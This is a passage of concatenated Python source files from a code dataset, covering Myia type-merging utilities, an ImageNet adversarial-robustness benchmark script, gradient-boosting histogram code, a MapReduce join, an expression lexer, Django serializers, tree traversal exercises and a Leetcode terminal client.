as bind_pending, but only for the\n top level call.\n \"\"\"\n if x1 is x2:\n return x1\n\n keypair = (id(x1), id(x2))\n if keypair in self.state:\n result = self.state[keypair]\n if result is ABSENT:\n # Setting forced=True will set the keypair to x1 (and then check\n # that x1 and x2 are compatible under forced=True), which lets us\n # return a result for self-referential data.\n return amerge(x1, x2, forced=True,\n bind_pending=bind_pending,\n accept_pending=accept_pending)\n else:\n return result\n\n def helper():\n nonlocal x1, x2\n while isinstance(x1, Pending) and x1.done() and not forced:\n x1 = x1.result()\n while isinstance(x2, Pending) and x2.done():\n x2 = x2.result()\n isp1 = isinstance(x1, Pending)\n isp2 = isinstance(x2, Pending)\n loop = x1.get_loop() if isp1 else x2.get_loop() if isp2 else None\n if isinstance(x1, PendingTentative):\n new_tentative = self(x1.tentative, x2, False, True, bind_pending)\n assert not isinstance(new_tentative, Pending)\n x1.tentative = new_tentative\n return x1\n if isinstance(x2, PendingTentative):\n new_tentative = self(x1, x2.tentative, forced,\n bind_pending, accept_pending)\n assert not isinstance(new_tentative, Pending)\n x2.tentative = new_tentative\n return new_tentative if forced else x2\n if (isp1 or isp2) and (not accept_pending or not bind_pending):\n if forced and isp1:\n raise MyiaTypeError('Cannot have Pending here.')\n if isp1:\n def chk(a):\n return self(a, x2, forced, bind_pending)\n return find_coherent_result_sync(x1, chk)\n if isp2:\n def chk(a):\n return self(x1, a, forced, bind_pending)\n return find_coherent_result_sync(x2, chk)\n if isp1 and isp2:\n return bind(loop, x1 if forced else None, [], [x1, x2])\n elif isp1:\n return bind(loop, x1 if forced else None, [x2], [x1])\n elif isp2:\n return bind(loop, x1 if forced else None, [x1], [x2])\n elif isinstance(x2, AbstractBottom): # pragma: no cover\n return x1\n elif isinstance(x1, AbstractBottom):\n if forced: # pragma: no cover\n # I am not sure how to trigger this\n raise TypeMismatchError(x1, x2)\n return x2\n elif x1 is ANYTHING:\n return x1\n elif x2 is ANYTHING:\n if forced:\n raise TypeMismatchError(x1, x2)\n return x2\n elif (type(x1) is not type(x2)\n and not isinstance(x1, (int, float, bool))):\n raise MyiaTypeError(\n f'Type mismatch: {type(x1)} != {type(x2)}; {x1} != {x2}'\n )\n else:\n return self.map[type(x1)](self, x1, x2, forced, bind_pending)\n\n self.state[keypair] = x1 if forced else ABSENT\n rval = helper()\n self.state[keypair] = rval\n if forced:\n assert rval is x1\n return rval\n\n\n@overload # noqa: F811\ndef amerge(self, x1: Possibilities, x2, forced, bp):\n if set(x1).issuperset(set(x2)):\n return x1\n if forced:\n raise MyiaTypeError(\n 'Additional Possibilities cannot be merged.'\n )\n else:\n return Possibilities(x1 + x2)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: TaggedPossibilities, x2, forced, bp):\n d1 = dict(x1)\n d2 = dict(x2)\n results = {}\n for i, t in d1.items():\n if i in d2:\n t = self(t, d2[i], forced, bp)\n results[i] = t\n for i, t in d2.items():\n if i not in d1:\n results[i] = t\n res = TaggedPossibilities(results.items())\n if res == x1:\n return x1\n elif forced:\n raise MyiaTypeError(\n 'Additional TaggedPossibilities cannot be merged.'\n )\n elif res == x2:\n return x2\n else:\n return res\n\n\n@overload # noqa: F811\ndef amerge(self, x1: xtype.TypeMeta, x2, forced, bp):\n if issubclass(x2, x1):\n return x1\n elif not forced and issubclass(x1, x2):\n return x2\n else:\n raise TypeMismatchError(x1, x2)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: TrackDict, x2, forced, bp):\n keys = {*x1.keys(), *x2.keys()}\n rval = type(x1)()\n changes = False\n for k in keys:\n if k in x1:\n v1 = x1[k]\n else:\n v1 = k.default()\n changes = True\n v2 = x2[k] if k in x2 else k.default()\n res = k.merge(self, v1, v2, forced, bp)\n if res is not v1:\n changes = True\n if res is not ABSENT:\n rval[k] = res\n if forced and changes and rval != x1:\n raise MyiaTypeError('Cannot merge tracks')\n return x1 if forced or not changes else rval\n\n\n@overload # noqa: F811\ndef amerge(self, x1: dict, x2, forced, bp):\n if set(x1.keys()) != set(x2.keys()):\n raise MyiaTypeError(f'Keys mismatch')\n changes = False\n rval = type(x1)()\n for k, v in x1.items():\n res = self(v, x2[k], forced, bp)\n if res is not v:\n changes = True\n rval[k] = res\n return x1 if forced or not changes else rval\n\n\n@overload # noqa: F811\ndef amerge(self, x1: (tuple, list), x2, forced, bp):\n if len(x1) != len(x2): # pragma: no cover\n raise MyiaTypeError(f'Tuple length mismatch')\n changes = False\n rval = []\n for v1, v2 in zip(x1, x2):\n res = self(v1, v2, forced, bp)\n if res is not v1:\n changes = True\n rval.append(res)\n return x1 if forced or not changes else type(x1)(rval)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractScalar, x2, forced, bp):\n values = self(x1.values, x2.values, forced, bp)\n if forced or values is x1.values:\n return x1\n return AbstractScalar(values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractError, x2, forced, bp):\n e1 = x1.xvalue()\n e2 = x2.xvalue()\n e = self(e1, e2, forced, bp)\n if forced or e is e1:\n return x1\n return AbstractError(e)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractFunction, x2, forced, bp):\n values = self(x1.get_sync(), x2.get_sync(), forced, bp)\n if forced or values is x1.values:\n return x1\n return AbstractFunction(*values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractTuple, x2, forced, bp):\n args1 = (x1.elements, x1.values)\n args2 = (x2.elements, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractTuple(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractArray, x2, forced, bp):\n args1 = (x1.element, x1.values)\n args2 = (x2.element, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractArray(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractClassBase, x2, forced, bp):\n args1 = (x1.tag, x1.attributes, x1.values)\n args2 = (x2.tag, x2.attributes, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n tag, attrs, values = merged\n return type(x1)(tag, attrs, values=values)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractDict, x2, forced, bp):\n args1 = (x1.entries, x1.values)\n args2 = (x2.entries, x2.values)\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return type(x1)(*merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: AbstractJTagged, x2, forced, bp):\n args1 = x1.element\n args2 = x2.element\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return AbstractJTagged(merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: (AbstractUnion, AbstractTaggedUnion),\n x2, forced, bp):\n args1 = x1.options\n args2 = x2.options\n merged = self(args1, args2, forced, bp)\n if forced or merged is args1:\n return x1\n return type(x1)(merged)\n\n\n@overload # noqa: F811\ndef amerge(self, x1: (int, float, bool), x2, forced, bp):\n if forced and x1 != x2:\n raise TypeMismatchError(x1, x2)\n return x1 if x1 == x2 else ANYTHING\n\n\n@overload # noqa: F811\ndef amerge(self, x1: object, x2, forced, bp):\n if x1 != x2:\n raise TypeMismatchError(x1, x2)\n return x1\n\n\ndef bind(loop, committed, resolved, pending):\n \"\"\"Bind Pendings together.\n\n Arguments:\n loop: The InferenceLoop.\n committed: Either None, or an abstract value that we are already\n committed to, which will force the merge to return that value.\n resolved: A set of Pendings that have already been resolved.\n pending: A set of unresolved Pendings.\n \"\"\"\n def amergeall():\n if committed is None:\n v = reduce(lambda x1, x2: amerge(x1, x2,\n forced=False,\n accept_pending=False),\n resolved)\n else:\n v = reduce(lambda x1, x2: amerge(x1, x2,\n forced=True,\n accept_pending=False),\n resolved, committed)\n return v\n\n resolved = list(resolved)\n pending = set(pending)\n assert pending\n\n def resolve(fut):\n nonlocal committed\n pending.remove(fut)\n result = fut.result()\n if fut is committed:\n committed = result\n resolved.append(result)\n if not pending:\n v = amergeall()\n if merged is not None and not merged.done():\n merged.set_result(v)\n\n for p in pending:\n p.add_done_callback(resolve)\n\n def premature_resolve():\n # This is what force_resolve() on the result will do\n nonlocal committed\n # We merge what we have so far\n committed = amergeall()\n # We broaden the result so that the as-of-yet unresolved stuff\n # can be merged more easily.\n committed = tentative(committed, loop)\n resolved.clear()\n return committed\n\n def priority():\n # Cannot force resolve unless we have at least one resolved Pending\n if not resolved and committed is None:\n return None\n if any(is_simple(x) for x in chain([committed], resolved, pending)):\n return 1000\n elif any(not nobottom(x) for x in resolved):\n # Bottom is always lower-priority\n return None\n else:\n return -1000\n\n if any(is_simple(x) for x in chain(resolved, pending)):\n # merged = None because we will not make a new Pending\n merged = None\n\n if pending:\n p, *rest = pending\n p.equiv.update(resolved)\n for p2 in rest:\n p.tie(p2)\n\n if resolved:\n rval = resolved[0]\n else:\n for p in pending:\n if is_simple(p):\n rval = p\n break\n else:\n raise AssertionError('unreachable')\n\n else:\n merged = loop.create_pending(\n resolve=premature_resolve,\n priority=priority,\n )\n merged.equiv.update(resolved)\n for p in pending:\n merged.tie(p)\n rval = merged\n\n if committed is None:\n return rval\n else:\n return committed\n\n\n###########################\n# Typing-related routines #\n###########################\n\n\ndef collapse_options(options):\n \"\"\"Collapse a list of options, some of which may be AbstractUnions.\"\"\"\n opts = []\n todo = list(options)\n while todo:\n option = todo.pop()\n if isinstance(option, AbstractUnion):\n todo.extend(option.options)\n else:\n opts.append(option)\n opts = Possibilities(opts)\n return opts\n\n\ndef union_simplify(options, constructor=AbstractUnion):\n \"\"\"Simplify a list of options.\n\n Returns:\n * None, if there are no options.\n * A single type, if there is one option.\n * An AbstractUnion.\n\n \"\"\"\n options = collapse_options(options)\n if len(options) == 0:\n return None\n elif len(options) == 1:\n return options.pop()\n else:\n return constructor(options)\n\n\ndef typecheck(model, abstract):\n \"\"\"Check that abstract matches the model.\"\"\"\n try:\n amerge(model, abstract, forced=True, bind_pending=False)\n except MyiaTypeError:\n return False\n else:\n return True\n\n\ndef split_type(t, model):\n \"\"\"Checks t against the model and return matching/non-matching subtypes.\n\n * If t is a Union, return a Union that fully matches model, and a Union\n that does not match model. No matches in either case returns None for\n that case.\n * Otherwise, return (t, None) or (None, t) depending on whether t matches\n the model.\n \"\"\"\n if isinstance(t, AbstractUnion):\n matching = [(opt, typecheck(model, opt))\n for opt in set(t.options)]\n t1 = union_simplify(opt for opt, m in matching if m)\n t2 = union_simplify(opt for opt, m in matching if not m)\n return t1, t2\n elif typecheck(model, t):\n return t, None\n else:\n return None, t\n\n\ndef hastype_helper(value, model):\n \"\"\"Helper to implement hastype.\"\"\"\n if isinstance(model, AbstractUnion):\n results = [hastype_helper(value, opt) for opt in model.options]\n if any(r is True for r in results):\n return True\n elif all(r is False for r in results):\n return False\n else:\n return ANYTHING\n else:\n match, nomatch = split_type(value, model)\n if match is None:\n return False\n elif nomatch is None:\n return True\n else:\n return ANYTHING\n\n\n#########################\n# ADT-related utilities #\n#########################\n\n\ndef normalize_adt(x):\n \"\"\"Normalize the ADT to make it properly recursive.\"\"\"\n rval = _normalize_adt_helper(x, {}, {})\n rval = rval.intern()\n rval = broaden(rval)\n rval = _finalize_adt(rval)\n return rval\n\n\ndef _normalize_adt_helper(x, done, tag_to_adt):\n if x in done:\n return done[x]\n if isinstance(x, AbstractADT):\n if x.tag not in tag_to_adt:\n adt = AbstractADT.new(\n x.tag,\n {k: AbstractUnion.new([]) for k in x.attributes},\n )\n tag_to_adt = {**tag_to_adt, x.tag: adt}\n else:\n adt = tag_to_adt[x.tag]\n done[x] = adt\n for attr, value in x.attributes.items():\n value = _normalize_adt_helper(value, done, tag_to_adt)\n adt.attributes[attr] = union_simplify(\n [adt.attributes[attr], value],\n constructor=AbstractUnion.new\n )\n return adt\n elif isinstance(x, AbstractUnion):\n opts = _normalize_adt_helper(x.options, done, tag_to_adt)\n rval = union_simplify(opts, constructor=AbstractUnion.new)\n done[x] = rval\n return rval\n elif isinstance(x, Possibilities):\n return [_normalize_adt_helper(opt, done, tag_to_adt) for opt in x]\n else:\n return x\n\n\n@abstract_clone.variant\ndef _finalize_adt(self, x: AbstractUnion):\n x = union_simplify(x.options)\n if isinstance(x, AbstractUnion):\n return (yield AbstractUnion)(self(x.options))\n else:\n yield None\n return self(x)\n","sub_path":"myia/abstract/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":35037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"425964277","text":"from realsafe.dataset.ImageNet import load_batches_imagenet_test\nfrom realsafe.benchmark.utils import imagenet_iteration_benchmark_parser\nfrom realsafe.benchmark.iteration_benchmark import IterationBenchmarkBuilder\nfrom realsafe.ImageNet.randomization import Randomization_Inception_v3\nimport tensorflow as tf\nimport numpy as np\nimport os\n\nBATCH_SIZE = 50\n\nSESSION = tf.Session()\n\nargs = imagenet_iteration_benchmark_parser()\n\nMODEL = Randomization_Inception_v3()\nprint('x_min={}\\nx_max={}\\nx_shape={}\\nn_class={}'.format(\n MODEL.x_min, MODEL.x_max, MODEL.x_shape, MODEL.n_class))\nLABEL_OFFSET = MODEL.n_class - 1000\n\nITERATION = 100\n\nMAGNITUDE_L_INF = 16.0 / 255.0\nALPHA_L_INF = 2.0 / 255.0\nSPSA_LR_L_INF = ALPHA_L_INF\n\nMAGNITUDE_L_2 = np.sqrt(1e-3 * np.prod(MODEL.x_shape))\nMAGNITUDE_L_2 *= MODEL.x_max - MODEL.x_min\nALPHA_L_2 = MAGNITUDE_L_2 * 0.15\nSPSA_LR_L_2 = 0.01\n\nMODEL.load(session=SESSION)\n\nbuilder = IterationBenchmarkBuilder()\n\nbuilder.config_init_l_inf('bim', {})\nbuilder.config_l_inf('bim', {\n 'magnitude': MAGNITUDE_L_INF,\n 'alpha': ALPHA_L_INF,\n 'session': SESSION,\n})\nbuilder.config_init_l_2('bim', {})\nbuilder.config_l_2('bim', {\n 'magnitude': MAGNITUDE_L_2,\n 'alpha': ALPHA_L_2,\n 'session': SESSION,\n})\n\n\nbuilder.config_init_l_inf('cw', {\n 'confidence': 1e-6,\n 'learning_rate': 1e-2,\n})\nbuilder.config_l_inf('cw', {\n 'cs': 1e-3,\n 'search_steps': 4,\n 'binsearch_steps': 10,\n})\nbuilder.config_init_l_2('cw', {\n 'confidence': 1e-6,\n 'learning_rate': 1e-2,\n})\nbuilder.config_l_2('cw', {\n 'cs': 1.0,\n 'search_steps': 2,\n 'binsearch_steps': 10,\n})\n\n\nbuilder.config_init_l_inf('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_inf('mim', {\n 'magnitude': MAGNITUDE_L_INF,\n 'alpha': ALPHA_L_INF,\n 'session': SESSION,\n})\nbuilder.config_init_l_2('mim', {\n 'decay_factor': 1.0\n})\nbuilder.config_l_2('mim', {\n 'magnitude': MAGNITUDE_L_2,\n 'alpha': ALPHA_L_2,\n 'session': SESSION,\n})\n\n\nbuilder.iteration(ITERATION)\nbuilder.batch_size(BATCH_SIZE)\nbuilder.no_batch_pred(True)\n\nbenchmark = builder.build(SESSION, MODEL,\n args.method, args.goal, args.distance_metric)\n\nos.makedirs(args.output_dir, exist_ok=True)\n\nfor count, (filenames, xs, ys, ys_target) in enumerate(\n load_batches_imagenet_test(\n batch_size=BATCH_SIZE, x_min=MODEL.x_min, x_max=MODEL.x_max,\n x_shape=MODEL.x_shape, x_dtype=MODEL.x_dtype, y_dtype=MODEL.y_dtype,\n start=0, end=1000, label_offset=LABEL_OFFSET,\n return_target_class=True)):\n print(count * BATCH_SIZE, (count + 1) * BATCH_SIZE)\n output_filename = os.path.join(args.output_dir, '%d_rs.npy' % count)\n rs = benchmark.run(xs, ys, ys_target)\n np.save(output_filename, rs)\n\nSESSION.close()\n","sub_path":"benchmark-v2/imagenet_rand_iteration.py","file_name":"imagenet_rand_iteration.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83561468","text":"import numpy as np\nfrom numba import njit\nfrom numba import float32, uint8\n\n\nHISTOGRAM_DTYPE = np.dtype([\n ('sum_gradients', np.float32),\n ('sum_hessians', np.float32),\n ('count', np.uint32),\n])\n\n\n@njit(fastmath=True)\ndef _build_histogram_naive(n_bins, sample_indices, binned_feature,\n ordered_gradients, ordered_hessians):\n histogram = np.zeros(n_bins, dtype=HISTOGRAM_DTYPE)\n for i, sample_idx in enumerate(sample_indices):\n bin_idx = binned_feature[sample_idx]\n histogram[bin_idx]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_idx]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_idx]['count'] += 1\n return histogram\n\n\n@njit(fastmath=True)\ndef build_histogram(n_bins, sample_indices, binned_feature,\n ordered_gradients, ordered_hessians):\n histogram = np.zeros(n_bins, dtype=HISTOGRAM_DTYPE)\n n_node_samples = sample_indices.shape[0]\n unrolled_upper = (n_node_samples // 4) * 4\n\n for i in range(0, unrolled_upper, 4):\n bin_0 = binned_feature[sample_indices[i]]\n bin_1 = binned_feature[sample_indices[i + 1]]\n bin_2 = binned_feature[sample_indices[i + 2]]\n bin_3 = binned_feature[sample_indices[i + 3]]\n\n histogram[bin_0]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_1]['sum_gradients'] += ordered_gradients[i + 1]\n histogram[bin_2]['sum_gradients'] += ordered_gradients[i + 2]\n histogram[bin_3]['sum_gradients'] += ordered_gradients[i + 3]\n\n histogram[bin_0]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_1]['sum_hessians'] += ordered_hessians[i + 1]\n histogram[bin_2]['sum_hessians'] += ordered_hessians[i + 2]\n histogram[bin_3]['sum_hessians'] += ordered_hessians[i + 3]\n\n histogram[bin_0]['count'] += 1\n histogram[bin_1]['count'] += 1\n histogram[bin_2]['count'] += 1\n histogram[bin_3]['count'] += 1\n\n for i in range(unrolled_upper, n_node_samples):\n bin_idx = binned_feature[sample_indices[i]]\n histogram[bin_idx]['sum_gradients'] += ordered_gradients[i]\n histogram[bin_idx]['sum_hessians'] += ordered_hessians[i]\n histogram[bin_idx]['count'] += 1\n\n return histogram\n\n\n@njit(fastmath=False)\ndef _split_gain(gradient_left, hessian_left, gradient_right, hessian_right,\n gradient_parent, hessian_parent, l2_regularization):\n \"\"\"Loss reduction\n\n Compute the reduction in loss after taking a split compared to keeping\n the node a leaf of the tree.\n\n See Equation 7 of:\n XGBoost: A Scalable Tree Boosting System, T. Chen, C. Guestrin, 2016\n https://arxiv.org/abs/1603.02754\n \"\"\"\n def negative_loss(gradient, hessian):\n return (gradient ** 2) / (hessian + l2_regularization)\n\n gain = negative_loss(gradient_left, hessian_left)\n gain += negative_loss(gradient_right, hessian_right)\n gain -= negative_loss(gradient_parent, hessian_parent)\n return gain\n\n\n@njit(locals={'gradient_left': float32, 'hessian_left': float32,\n 'best_gain': float32, 'best_bin_idx': uint8},\n fastmath=True)\ndef find_split(histogram, gradient_parent, hessian_parent, l2_regularization):\n gradient_left, hessian_left = 0., 0.\n best_gain = 0.\n best_bin_idx = 0\n for bin_idx in range(histogram.shape[0]):\n gradient_left += histogram[bin_idx]['sum_gradients']\n hessian_left += histogram[bin_idx]['sum_hessians']\n gradient_right = gradient_parent - gradient_left\n hessian_right = hessian_parent - hessian_left\n gain = _split_gain(gradient_left, hessian_left,\n gradient_right, hessian_right,\n gradient_parent, hessian_parent,\n l2_regularization)\n if gain > best_gain:\n best_gain = gain\n best_bin_idx = bin_idx\n return (best_bin_idx, best_gain)\n","sub_path":"pygbm/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"718772","text":"import MapReduce\nimport sys\n\n# Part 1\nmr = MapReduce.MapReduce()\n \n# Part 2\ndef mapper(record):\n # key: document identifier\n # value: document contents\n key = record[1]\n value = record\n #value.append(record[0])\n #words = value.split()\n #print record\n #print record\n mr.emit_intermediate(key, value) \n \n# Part 3\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n doc_list = list()\n for v in list_of_values:\n if len(v) == 10:\n basic_list = v\n for v in list_of_values:\n if len(v) == 17:\n new_list = list(basic_list)\n for el in v:\n new_list.append(el)\n mr.emit((new_list))\n\n# Part 4\ninputdata = open(sys.argv[1])\nmr.execute(inputdata, mapper, reducer)\n","sub_path":"assignment3/join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"430407725","text":"operateur = {'=': {\"associativity\": \"GAUCHE\", \"precedence\": 1},\n '+': {\"associativity\": \"GAUCHE\", \"precedence\": 2},\n '-': {\"associativity\": \"GAUCHE\", \"precedence\": 2},\n '/': {\"associativity\": \"GAUCHE\", \"precedence\": 3},\n '*': {\"associativity\": \"GAUCHE\", \"precedence\": 3},\n '^': {\"associativity\": \"DROITE\", \"precedence\": 4},\n '(': {\"associativity\": \"GAUCHE\", \"precedence\": 5},\n ')': {\"associativity\": \"GAUCHE\", \"precedence\": 5}}\n\ndef operande_token(line, i):\n\ttmp = ''\n\ttoken = {}\n\tnb_float = 0\n\tvalue_or_name = \"value\"\n\tinconnu = None\n\twhile (i < len(line) and (line[i].isnumeric()\n\t\t\tor line[i] == '.' or line[i].isalpha())):\n\t\tif line[i].isalpha() and value_or_name == \"value\":\n\t\t\tvalue_or_name = \"name\"\n\t\t\tinconnu = ''\n\t\tif value_or_name == \"value\":\n\t\t\tif line[i] == '.': nb_float += 1\n\t\t\tif line[i].isnumeric(): tmp += line[i]\n\t\tif value_or_name == \"name\":\n\t\t\tinconnu += line[i]\n\t\ti += 1\n\tif inconnu and tmp == '': tmp = '1'\n\tif nb_float > 1: return {\"Error\": tmp}, i\n\tif nb_float == 1: token[\"value\"] = float(tmp)\n\tif nb_float == 0: token[\"value\"] = int(tmp)\n\ttoken[\"type\"] = \"operande\"\n\ttoken[\"inconnu\"] = inconnu\n\treturn token, i\n\ndef operator_token(char):\n\ttoken = {}\n\ttoken[\"type\"] = \"operateur\"\n\ttoken[\"value\"] = char\n\ttoken[\"associativity\"] = operateur[char][\"associativity\"]\n\ttoken[\"precedence\"] = operateur[char][\"precedence\"]\n\treturn token\n\n'''Créer un liste qui contient les tokens et verifie qu'il n'y a que des caractères autorisés dans l'expression.'''\ndef generate_tokens(line):\n\tline = line.replace(',', '.')\n\ttokens = []\n\ti = 0\n\tlength = len(line)\n\twhile i < length:\n\t\tif line[i].isnumeric() or line[i].isalpha():\n\t\t\ttoken, i = operande_token(line, i)\n\t\t\ttokens.append(token)\n\t\telse:\n\t\t\ttoken = operator_token(line[i])\n\t\t\ttokens.append(token)\n\t\t\ti += 1\n\tfor token in tokens:\n\t\tif \"Error\" in token:\n\t\t\tprint(\"Error on value :\", token[\"Error\"])\n\t\t\treturn\n\treturn tokens\n\ndef remove_comment(line):\n\tif line[0] == '#':\n\t\treturn None\n\tfor i in range(0, len(line)):\n\t\tif line[i] == '#':\n\t\t\treturn line[:i]\n\treturn line\n\ndef tokenize_expressions(file):\n\texpressions = []\n\tfile = file.strip()\n\tfile = file.replace(\" \", \"\")\n\tsplit = file.split('\\n')\n\tif \"\" in split:\n\t\tsplit.remove(\"\")\n\tfor line in split:\n\t\tline = remove_comment(line)\n\t\tif line:\n\t\t\ttokens = generate_tokens(line)\n\t\t\tif tokens:\n\t\t\t\tprint(tokens)\n\t\t\t\texpressions.append(tokens)\n\treturn expressions","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640180625","text":"from rest_framework import serializers\nfrom orders.models import OrderItem, Order\nfrom accounts.serializers import CustomerSerializer\n\n\nclass OrderItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = OrderItem\n fields = [\n 'id','order','quantity',\n 'product','price'\n ]\n read_only_fields = ['id','price','order']\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n customer = CustomerSerializer()\n order_items = OrderItemSerializer(source='orderitem_set',many=True)\n\n class Meta:\n model = Order\n fields = ['id','customer','status','total_price','order_items']\n read_only_fields = ['total_price']\n\n def validate_status(self, value):\n if value == 'delivered':\n raise serializers.ValidationError(\"Changing to this status is prohibited\")\n return value\n\n\nclass OrderCreateSerializer(serializers.ModelSerializer):\n order_items = serializers.ListField(\n child=OrderItemSerializer(),\n allow_empty=True\n )\n class Meta:\n model = Order \n fields = ['id','customer','status','total_price','order_items']\n read_only_fields = ['total_price','status']\n \n def create(self, validated_data):\n order_items = validated_data.pop('order_items')\n order = Order.objects.create(**validated_data)\n for item in order_items:\n OrderItem.objects.create(\n order=order,**item\n )\n order.save()\n return order","sub_path":"orders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473944293","text":"import random\nimport MinHeap\n\n# I just want to create a tree, and print it out\n# maybe just work with array implementation first?\ntree = [random.randint(0, 50) for x in range(20)]\n\n# in-order traversal\ndef inOrderTraversal(tree, index):\n # make sure the index we are trying to access is valid\n if index > len(tree) - 1:\n return\n \n # left, current, right\n inOrderTraversal(tree, (2*index + 1))\n print(tree[index])\n inOrderTraversal(tree, (2*index + 2))\n\ndef preOrderTraversal(tree, index):\n if index > len(tree) - 1:\n return\n \n # Root, Left, right\n print(tree[index])\n preOrderTraversal(tree, (2*index + 1))\n preOrderTraversal(tree, (2*index + 2))\n\ndef postOrderTraversal(tree, index):\n if index > len(tree) - 1:\n return\n \n # Left, right, Root\n preOrderTraversal(tree, (2*index + 1))\n preOrderTraversal(tree, (2*index + 2))\n print(tree[index])\n\nprint(\"In-Order Traversal\")\ninOrderTraversal(tree, 0)\n\nprint(\"Pre-Order Traversal\")\npreOrderTraversal(tree, 0)\n\nprint(\"Post-Order Traversal\")\npostOrderTraversal(tree, 0)\n\n# lets test the heap stuff that we just made\nheap = MinHeap.MinHeap()\nfor x in range(20):\n heap.insert(random.randint(0, 100))\n\nprint(\"Current Min Heap: {}\".format(heap.heap))\n","sub_path":"trees_and_graphs/implementations/tree_playground.py","file_name":"tree_playground.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"620007026","text":"import urwid\nfrom .leetcode import Leetcode\nfrom .views import HomeView, DetailView, HelpView\n\npalette = [\n ('body', 'dark cyan', ''),\n ('focus', 'white', ''),\n ('head', 'white', 'dark gray'),\n ('lock', 'dark gray', '')\n ]\n\nclass Terminal(object):\n def __init__(self):\n self.home_view = None\n self.loop = None\n self.leetcode = Leetcode()\n self.help_view = None\n self.quit_confirm_view = None\n self.view_stack = []\n self.detail_view = None\n self.search_view = None\n\n @property\n def current_view(self):\n return None if not len(self.view_stack) else self.view_stack[-1]\n\n @property\n def is_home(self):\n return len(self.view_stack) == 1\n\n def goto_view(self, view):\n self.loop.widget = view\n self.view_stack.append(view)\n\n def go_back(self):\n self.view_stack.pop()\n self.loop.widget = self.current_view\n\n def keystroke(self, key):\n if self.quit_confirm_view and self.current_view == self.quit_confirm_view:\n if key is 'y':\n raise urwid.ExitMainLoop()\n else:\n self.go_back()\n\n elif self.current_view == self.search_view and key is 'enter':\n text = self.search_view.contents[1][0].original_widget.get_edit_text()\n for i, item in enumerate(self.home_view.listbox.contents()):\n if item[0].data.id == text:\n self.home_view.listbox.focus_position = i\n break\n self.go_back()\n\n elif key in ('q', 'Q'):\n self.goto_view(self.make_quit_confirmation())\n\n elif key is 'R':\n items = self.leetcode.hard_retrieve_home()\n self.home_view = self.make_listview(items)\n self.view_stack = []\n self.goto_view(self.home_view)\n\n elif self.is_home and (key is 'l' or key is 'enter' or key is 'right'):\n if self.home_view.listbox.get_focus()[0].selectable():\n if self.detail_view and self.detail_view.title == self.home_view.listbox.get_focus()[0].data.title:\n self.goto_view(self.detail_view)\n else:\n title, body, code = self.leetcode.retrieve_detail(self.home_view.listbox.get_focus()[0].data)\n self.goto_view(self.make_detailview(title, body, code))\n\n elif not self.is_home and (key is 'left' or key is 'h'):\n self.go_back()\n\n elif key is 'H':\n if not self.help_view:\n self.make_helpview()\n self.goto_view(self.help_view)\n\n elif self.is_home and key is 'f':\n self.make_search_view()\n self.goto_view(self.search_view)\n\n else:\n return key\n\n def make_quit_confirmation(self):\n text = urwid.AttrMap(urwid.Text('Do you really want to quit ? (y/n)'), 'body')\n self.quit_confirm_view = urwid.Overlay(text, self.current_view, 'left',\n ('relative', 100), 'bottom', None)\n return self.quit_confirm_view\n\n def make_search_view(self):\n text = urwid.AttrMap(urwid.Edit('Search by id: ', ''), 'body')\n self.search_view = urwid.Overlay(text, self.current_view, 'left',\n ('relative', 100), 'bottom', None)\n return self.search_view\n\n def make_detailview(self, title, body, code):\n quizid = self.home_view.listbox.get_focus()[0].data.id\n self.detail_view = DetailView(title, body, code, quizid, self.leetcode.config)\n return self.detail_view\n\n def make_listview(self, data):\n header = self.make_header()\n self.home_view = HomeView(data, header)\n return self.home_view\n\n def make_header(self):\n if self.leetcode.is_login:\n columns = [\n ('fixed', 15, urwid.Padding(urwid.AttrWrap(\n urwid.Text('%s' % self.leetcode.config.username),\n 'head', ''), left=2)),\n urwid.AttrWrap(urwid.Text('You have solved %d / %d problems. ' %\n (len(self.leetcode.solved), len(self.leetcode.items))), 'head', ''),\n ]\n return urwid.Columns(columns)\n else:\n text = urwid.AttrWrap(urwid.Text('Not login'), 'head')\n return text\n\n def make_helpview(self):\n self.help_view = HelpView()\n return self.help_view\n\n def run(self):\n 